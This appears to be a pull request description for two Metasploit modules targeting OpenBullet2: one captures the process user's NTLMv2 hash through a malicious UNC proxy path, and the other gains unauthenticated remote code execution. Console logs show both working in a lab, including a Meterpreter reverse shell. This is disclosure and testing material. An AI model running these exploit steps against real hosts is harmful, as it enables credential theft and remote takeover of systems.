Add OpenBullet2 modules (CVE-2026-25856 and CVE-2026-39908)

[vognik]

CVE-2026-39908

Vulnerability Details

This Metasploit module exploits a Credential Disclosure vulnerability in OpenBullet2 on Windows.

An attacker can force the application to disclose the NTLMv2 hash of the process user by configuring a job proxy source with a malicious UNC path. When the job starts, the application attempts to load proxies from the specified path via SMB, allowing the hash to be captured for offline cracking or relaying.

The affected versions include releases from 0.2.5.

Module Information

Module path: modules/auxiliary/scanner/http/openbullet2_unauth_hash_disclosure_cve_2026_39908.rb
Platform: Windows

References

• https://hackernoon.com/one-empty-header-to-admin-how-an-auth-bypass-breaks-openbullet2

Test Output

msf > use scanner/http/openbullet2_unauth_hash_disclosure_cve_2026_39908
msf auxiliary(scanner/http/openbullet2_unauth_hash_disclosure_cve_2026_39908) > set SRVHOST eth0
SRVHOST => 192.168.19.153
msf auxiliary(scanner/http/openbullet2_unauth_hash_disclosure_cve_2026_39908) > set RHOST 192.168.19.154
RHOST => 192.168.19.154
msf auxiliary(scanner/http/openbullet2_unauth_hash_disclosure_cve_2026_39908) > set RPORT 5000
RPORT => 5000
msf auxiliary(scanner/http/openbullet2_unauth_hash_disclosure_cve_2026_39908) > run
[*] Running module against 192.168.19.154
[*] Running automatic check ("set AutoCheck false" to disable)
[*] OpenBullet2 Instance OS: Microsoft Windows NT 10.0.19044.0
[+] The target appears to be vulnerable. Detected version 0.3.3.3093, which is vulnerable
[*] Server is running. Listening on 192.168.19.153:445
[*] The SMB service has been started.
[*] Listening for hashes on 192.168.19.153:445
[SMB] NTLMv2-SSP Client     : 192.168.19.154
[SMB] NTLMv2-SSP Username   : DESKTOP-1E5TEED\admin
[SMB] NTLMv2-SSP Hash       : admin::DESKTOP-1E5TEED:[HASH]

[*] Server stopped.
[*] Auxiliary module execution completed

CVE-2026-25856

Vulnerability Details

This Metasploit module exploits an Unauthenticated Remote Code Execution (RCE) vulnerability in OpenBullet2.

Attackers can leverage the plain C# execution mode, which lacks reference filtering or API restrictions, to access the file system, spawn processes, and invoke arbitrary .NET APIs as the process user.

The affected versions include releases from 0.2.5.

Module Information

Module path: modules/exploits/multi/http/openbullet2_unauth_rce_cve_2026_25856.rb
Platform: Windows/Unix/Linux

References

• https://hackernoon.com/one-empty-header-to-admin-how-an-auth-bypass-breaks-openbullet2

Test Output

msf > use exploit/multi/http/openbullet2_unauth_rce_cve_2026_25856
[*] Using configured payload 
msf exploit(multi/http/openbullet2_unauth_rce_cve_2026_25856) > set RHOSTS 192.168.19.154
RHOSTS => 192.168.19.154
msf exploit(multi/http/openbullet2_unauth_rce_cve_2026_25856) > set RPORT 5000
RPORT => 5000
msf exploit(multi/http/openbullet2_unauth_rce_cve_2026_25856) > set target 2
target => 2
msf exploit(multi/http/openbullet2_unauth_rce_cve_2026_25856) > set LHOST eth0
LHOST => eth0
msf exploit(multi/http/openbullet2_unauth_rce_cve_2026_25856) > run
[*] Started reverse TCP handler on 192.168.19.153:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] OS: Microsoft Windows NT 10.0.19044.0
[+] The target appears to be vulnerable. Detected version 0.3.3.3093, which is vulnerable
[*] Sending stage (232006 bytes) to 192.168.19.154
[*] Meterpreter session 1 opened (192.168.19.153:4444 -> 192.168.19.154:50388) at 2026-06-06 03:42:13 -0400

meterpreter > sysinfo
Computer        : DESKTOP-1E5TEED
OS              : Windows 10 21H2 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-1E5TEED\admin